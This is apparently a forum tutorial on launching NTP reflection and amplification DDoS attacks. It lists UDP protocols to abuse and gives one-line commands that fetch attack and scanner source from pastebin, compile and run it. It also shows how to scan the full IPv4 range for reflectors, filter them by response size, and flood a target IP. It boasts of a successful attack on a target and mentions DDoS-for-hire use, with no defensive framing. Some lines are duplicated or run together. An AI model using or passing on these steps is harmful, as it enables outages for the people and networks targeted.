DrDoS
1.0 Introduction to DrDoS
Distributed Reflection Denial of Service, also known as DrDoS has been used for years to create some of the world's largest DDoS attacks! Over the past 5-6 years it has gotten so easy that now anyone can do it with just $10 and some simple knowledge of the Linux OS. Many people use DrDoS in combination with botnets, controlling mass quantities of bots that are able to launch a reflected attack can be overpowering to some. DrDoS is often used in DDoS for Hire sites.
Reflection takes advantage of UDP services. UDP, by design, is a connectionless internet protocol in which the reciever does not fully validate the IPv4 address of the source. This lack of validation makes it possible for someone to pretent to be you! Since it seems like the packets are coming from the target's IP, typically it will send all requests back said IP. This serves 2 purposes of the attack, attack can hide his identity and amplify the attacks greatly.
1.1 Types of Amplification Vectors
In the past there was only DNS amplification, until people started experimenting with other UDP based protocols. Each protocol has a different Bandwidth Amplification Factor, meaning one method might amplify.
100Mbps -> 5000Mbps while another might give you this result: 100Mbps -> 1000Mbps
100Mbps -> 5000Mbps while another might give you this result: 100Mbps -> 1000Mbps
Here is but a short list of protocols you can abuse:
DNS
DNS
CHARGEN
NTP
SNMPv2
SSDP
Quote of the Day
Teamspeak 3
Quake Network Protocol
BitTorrent
NetBIOS
MSSQL
PORTMAP
RIP
2.0 Launching a DrDoS Attack
This tutorial is focused around the NTP attack vector.
![[Image: Abusing+Network+Time+Protocol+(NTP)+to+p...attack.jpg]](https://3.bp.blogspot.com/-oVSLtOdo3bQ/UsZi5V-kLdI/AAAAAAAAZZk/C3qUk3gdGDk/s728/Abusing+Network+Time+Protocol+(NTP)+to+perform+massive+Reflection+DDoS+attack.jpg)
Here is what you will need for this
- Common Sense
- Spoofed Dedicated Server with Ubuntu 14.04 64bit Installed
- Server for reflector scanning
1.) First you need to setup your attacking server. You can login using a SSH client called PuTTy.
![[Image: bb874f939b38428bafad5e30cf8d2da4.png]](http://image.prntscr.com/image/bb874f939b38428bafad5e30cf8d2da4.png)
2.) You will need to install the dependencies for you to run the attack script
Code:
apt-get install gcc wget3.) Now install the NTP Attack Script:
Code:
wget -q http://pastebin.com/raw/fcyCGWqw -O ntp.c; gcc -o ntp ntp.c -pthread; rm -rf ntp.c; ./ntp4.) Here is where you login to your scanning server! And run these commands
Code:
apt-get install gcc wget -y; wget -q http://pastebin.com/raw/XWFfm5hh -O ntpscan.c; gcc -o ntpscan ntpscan.c -pthread; rm -rf ntpscan.c; ./ntpscanCode:
Example for scanning: ./ntpscan 1.0.0.0 255.255.255.255 ntp.txt 3 5Should look something like this:
![[Image: 94f2696d150f40e0acb745ac95343ecc.png]](http://image.prntscr.com/image/94f2696d150f40e0acb745ac95343ecc.png)
5.) Filtering your reflection lists:
You will often get multipe IPs in one list. Sorts out any duplicate IPs :
cat scanned.txt | sort -u > unique.txt
cat scanned.txt | sort -u > unique.txt
Sorts IPs over certain response size(ex: 300):
cat scannedlist.txt |awk '{if($2>300)print $1}' | sort -u > output.txt
cat scannedlist.txt |awk '{if($2>300)print $1}' | sort -u > output.txt
6.) Now log back into your attacking server and upload your new filtered reflection list of NTP servers. And use this command
to start an attack. Time is in seconds.
Ex: ./ntp 75.14.61.198 ntp.txt 1 -1 300
7.) Here are some results of the successful amplification against another target:
Code:
Usage: ./ntp [IP] [file] [threads] [limiter] [time]7.) Here are some results of the successful amplification against another target:
![[Image: 14af945bb98749e9a0e65765ddd1594e.png]](http://image.prntscr.com/image/14af945bb98749e9a0e65765ddd1594e.png)
![[Image: py063Fi.png]](http://i.imgur.com/py063Fi.png)
![[Image: FTYbRmR.gif]](http://i.imgur.com/FTYbRmR.gif)
![[Image: FTYbRmR.gif]](https://i.imgur.com/FTYbRmR.gif)
